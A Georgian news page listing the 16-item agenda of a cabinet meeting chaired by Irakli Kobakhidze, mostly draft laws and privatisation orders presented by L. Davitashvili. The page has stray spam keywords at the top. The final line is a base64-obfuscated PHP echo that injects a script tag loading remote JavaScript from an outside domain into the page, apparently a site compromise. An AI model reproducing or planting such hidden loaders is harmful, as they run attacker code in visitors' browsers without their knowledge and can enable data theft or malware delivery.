celsiusi
ავერსი შნაიდერი

 მთავრობის ადმინისტრაციაში დღეს მინისტრთა კაბინეტის სხდომა გაიმართება. ირაკლი კობახიძის ხელმძღვანელობით, მინისტრთა კაბინეტი დღის წესრიგით გათვალისწინებულ 16 საკითხს განიხილავს.

1. საქართველოს კანონების პროექტები „საქართველოს სარკინიგზო კოდექსში ცვლილების შეტანის
შესახებ“ და „საქართველოს ადმინისტრაციულ სამართალდარღვევათა კოდექსში ცვლილების შეტანის
შესახებ“

მომხსენებელი: ლ. დავითაშვილი

2. საქართველოს კანონის პროექტი "ლიცენზიებისა და ნებართვების შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“

მომხსენებელი: ლ. დავითაშვილი

3. საქართველოს მთავრობის განკარგულების პროექტი "სახელმწიფო საკუთრებაში არსებული უძრავი ქონების უსასყიდლოდ საკუთრებაში გადაცემის ფორმით პრივატიზების შესახებ”

მომხსენებელი: ლ. დავითაშვილი


4. საქართველოს მთავრობის განკარგულების პროექტი "სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „თბილისი ენერჯისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“

მომხსენებელი: ლ. დავითაშვილი

5. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „პორტ ავლაბრისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“ საქართველოს მთავრობის 2023 წლის 31 მაისის N1034 განკარგულებაში ცვლილების შეტანის თაობაზე”

მომხსენებელი: ლ. დავითაშვილი

6. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ნივთების შპს „საზოგადოებრივი კოლეჯისთვის „შვეიცარიული აგრარული სკოლა კავკასიისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“ საქართველოს მთავრობის 2018 წლის 8 ივნისის №1267 განკარგულებაში ცვლილების შეტანისა და შპს „შვეიცარიული აგრარული სკოლა კავკასიის“ საქმიანობის ხელშესაწყობად რიგ ღონისძიებათა განხორციელების თაობაზე”

მომხსენებელი: ლ. დავითაშვილი

7. საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ფოთის ახალი საზღვაო ნავსადგურისათვის“ აღნაგობის უფლებით გადაცემის თაობაზე თანხმობის მიცემის შესახებ“

მომხსენებელი: ლ. დავითაშვილი

8. საქართველოს მთავრობის განკარგულების პროექტი ,,შპს „ორბი ჯგუფი ბახმაროს“ საქმიანობის ხელშესაწყობად რიგ ღონისძიებათა განხორციელების თაობაზე“

მომხსენებელი: ლ. დავითაშვილი

9. საქართველოს მთავრობის განკარგულების პროექტი ,,შპს „ინვესტ ჯგუფის“ საქმიანობის ხელშესაწყობად რიგ ღონისძიებათა განხორციელების თაობაზე”

მომხსენებელი: ლ. დავითაშვილი

10. საქართველოს მთავრობის განკარგულების პროექტი ,,საქართველოს მთავრობასა და შპს ,,საერთაშორისო ენერგო კორპორაციას“ შორის ,,ლუხუნი 2 ჰესის“ შესახებ 2020 წლის 12 თებერვალს დადებულ ურთიერთგაგების მემორანდუმში ცვლილების შეტანის თაობაზე”

მომხსენებელი: ლ. დავითაშვილი

11. საქართველოს მთავრობის განკარგულების პროექტი "საქართველოს მთავრობასა და შპს „ტაბას“ შორის 2015 წლის 16 ნოემბერს დადებული ურთიერთგაგების მემორანდუმის ფარგლებში განსახორციელებელი ღონისძიებების შესახებ“

მომხსენებელი: ლ. დავითაშვილი

12. საქართველოს მთავრობის განკარგულების პროექტი ,,შპს „საქართველოს აეროპორტების გაერთიანების“ ინფორმაციის მოწონების თაობაზე”

მომხსენებელი: ლ. დავითაშვილი


13. საქართველოს მთავრობის განკარგულების პროექტი ,,უცხოელი ინვესტორების მოზიდვის მიზნით სსიპ „ნავთობისა და გაზის სახელმწიფო სააგენტოსა“ და სს „საქართველოს ნავთობისა და გაზის კორპორაციის“ მიერ განსახორციელებელი ღონისძიებების შესახებ”

მომხსენებელი: ლ. დავითაშვილი

14. საქართველოს მთავრობის დადგენილების პროექტი „განახლებადი წყაროებიდან ენერგიის წარმოებისა და გამოყენების მხარდაჭერის სქემისა და სიმძლავრის აუქციონის წესების დამტკიცების შესახებ“ საქართველოს მთავრობის 2022 წლის 7 დეკემბრის №556 დადგენილებაში ცვლილების შეტანის თაობაზე“

მომხსენებელი: ლ. დავითაშვილი

15. საქართველოს მთავრობის განკარგულების პროექტი ,,საგადასახადო შეთანხმებების გაფორმების შესახებ“

მომხსენებელი: ლ. ხუციშვილი

16. საიდუმლო

171
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");